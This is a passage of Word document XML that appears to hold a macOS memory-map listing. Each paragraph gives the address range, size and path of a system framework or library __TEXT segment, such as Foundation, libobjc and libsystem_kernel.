        <w:t>__TEXT                 00007fff91894000-00007fff9191e000 [  552K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9191e000-00007fff91924000 [   24K] r-x/r-x SM=COW  /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff919bb000-00007fff919cd000 [   72K] r-x/r-x SM=COW  /usr/lib/libz.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff919cd000-00007fff919d0000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libsystem_sandbox.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91af3000-00007fff91afd000 [   40K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91afd000-00007fff91aff000 [    8K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/TrustEvaluationAgent.framework/Versions/A/TrustEvaluationAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91aff000-00007fff91b1c000 [  116K] r-x/r-x SM=COW  /usr/lib/system/libsystem_malloc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91dda000-00007fff91df7000 [  116K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff91e01000-00007fff91e4b000 [  296K] r-x/r-x SM=COW  ...m/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9217c000-00007fff921a2000 [  152K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff921ad000-00007fff921db000 [  184K] r-x/r-x SM=COW  /System/Library/Frameworks/Accounts.framework/Versions/A/Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff921db000-00007fff92229000 [  312K] r-x/r-x SM=COW  ...tem/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff92267000-00007fff92285000 [  120K] r-x/r-x SM=COW  /usr/lib/system/libsystem_kernel.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff922d3000-00007fff92351000 [  504K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9235e000-00007fff92387000 [  164K] r-x/r-x SM=COW  /usr/lib/system/libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff92518000-00007fff9252b000 [   76K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreDuetDaemonProtocol.framework/Versions/A/CoreDuetDaemonProtocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff92be8000-00007fff92bff000 [   92K] r-x/r-x SM=COW  /usr/lib/system/libsystem_asl.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff92bff000-00007fff92de5000 [ 1944K] r-x/r-x SM=COW  /usr/lib/libobjc.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff92df8000-00007fff92dfa000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libremovefile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9333c000-00007fff933ac000 [  448K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff933ac000-00007fff933be000 [   72K] r-x/r-x SM=COW  /usr/lib/system/libsystem_coretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff933be000-00007fff934b1000 [  972K] r-x/r-x SM=COW  /usr/lib/libiconv.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93513000-00007fff93518000 [   20K] r-x/r-x SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93550000-00007fff93553000 [   12K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93558000-00007fff93560000 [   32K] r-x/r-x SM=COW  /System/Library/Frameworks/NetFS.framework/Versions/A/NetFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93991000-00007fff9399b000 [   40K] r-x/r-x SM=COW  /usr/lib/system/libsystem_notify.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9399b000-00007fff939f0000 [  340K] r-x/r-x SM=COW  /usr/lib/libc++.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93a1c000-00007fff93a38000 [  112K] r-x/r-x SM=COW  /usr/lib/libCRFSuite.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93a51000-00007fff93a5c000 [   44K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93a5c000-00007fff93a65000 [   36K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93a65000-00007fff93a6d000 [   32K] r-x/r-x SM=COW  /usr/lib/system/libcompiler_rt.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93b2a000-00007fff93e59000 [ 3260K] r-x/r-x SM=COW  /System/Library/Frameworks/Foundation.framework/Versions/C/Foundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93e59000-00007fff93e79000 [  128K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CoreDuet.framework/Versions/A/CoreDuet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff93e79000-00007fff93e7e000 [   20K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__TEXT                 00007fff93e7e000-00007fff93e98000 [  104K] r-x/r-x SM=COW  ...brary/Frameworks/OpenDirectory.framework/Versions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirectory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94048000-00007fff94074000 [  176K] r-x/r-x SM=COW  /usr/lib/libc++abi.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff941ea000-00007fff941ec000 [    8K] r-x/r-x SM=COW  /usr/lib/system/libsystem_blocks.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff941ec000-00007fff942e1000 [  980K] r-x/r-x SM=COW  ...ameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff944cb000-00007fff944cc000 [    4K] r-x/r-x SM=COW  /System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff949e0000-00007fff94a40000 [  384K] r-x/r-x SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94a40000-00007fff94b34000 [  976K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJP2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94edc000-00007fff94f15000 [  228K] r-x/r-x SM=COW  /usr/lib/system/libsystem_network.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94f72000-00007fff94f75000 [   12K] r-x/r-x SM=COW  /usr/lib/system/libquarantine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94f75000-00007fff94f7a000 [   20K] r-x/r-x SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libGIF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94f7a000-00007fff94fc7000 [  308K] r-x/r-x SM=COW  /usr/lib/libcups.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff94fc7000-00007fff94fc8000 [    4K] r-x/r-x SM=COW  /usr/lib/system/liblaunch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff950f0000-00007fff9511c000 [  176K] r-x/r-x SM=COW  .../Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/DictionaryServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff9511c000-00007fff95123000 [   28K] r-x/r-x SM=COW  /usr/lib/system/libsystem_trace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff951b0000-00007fff951ec000 [  240K] r-x/r-x SM=COW  /System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95213000-00007fff9522e000 [  108K] r-x/r-x SM=COW  /usr/lib/libextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__TEXT                 00007fff95247000-00007fff9524b000 [   16K] r-x/r-x SM=COW  /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurface</w:t>
      </w:r>
    </w:p>
